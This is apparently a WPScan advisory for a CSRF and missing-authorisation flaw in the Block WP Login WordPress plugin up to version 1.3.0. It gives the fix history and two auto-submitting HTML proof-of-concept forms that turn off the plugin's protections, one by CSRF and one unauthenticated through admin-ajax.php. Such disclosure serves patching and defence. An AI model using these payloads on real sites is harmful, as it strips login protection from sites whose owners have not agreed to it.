Block WP Login <= 1.3.0 - CSRF and Unauthorised Settings Update



Description
Lack of CSRF and authorisation checks in the bwpl_configure_slug() function registered as an admin_init action could allow attacker (via CSRF, or unauthenticated using the admin-ajax.php) to change the plugin settings (located at /wp-admin/options-permalink.php) and disable the protection offered.

v1.3.1 added a nonce check, but not authorisation checks - vendor contacted about it.
v1.3.2 added the authorisation checks
Proof of Concept
Settings Update via CSRF:

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/options-permalink.php" method="POST">
      <input type="hidden" name="bwpl_slug" value="" />
      <input type="hidden" name="bwpl_ajax" value="" />
      <input type="hidden" name="bwpl_cron" value="" />
      <input type="hidden" name="bwpl_xmlrpc" value="" />
      <input type="hidden" name="bwpl_robots" value="true" />
    </form>
  </body>
</html>

Settings Update as Unauthenticated using admin-ajax.php:
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="a" />
      <input type="hidden" name="bwpl_slug" value="" />
      <input type="hidden" name="bwpl_ajax" value="" />
      <input type="hidden" name="bwpl_cron" value="" />
      <input type="hidden" name="bwpl_xmlrpc" value="true" />
      <input type="hidden" name="bwpl_robots" value="" />
    </form>
  </body>
</html>


Affects Plugin

fixed in version 1.3.2

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2113620%40block-wp-login&old=2042772%40block-wp-login

Classification

Type MULTI

Miscellaneous

Views 1181
Verified Yes
WPVDB ID 9401

Timeline

Publicly Published 2019-06-27 (27 days ago)
Added 2019-06-27 (26 days ago)
Last Updated 2019-06-28 (25 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin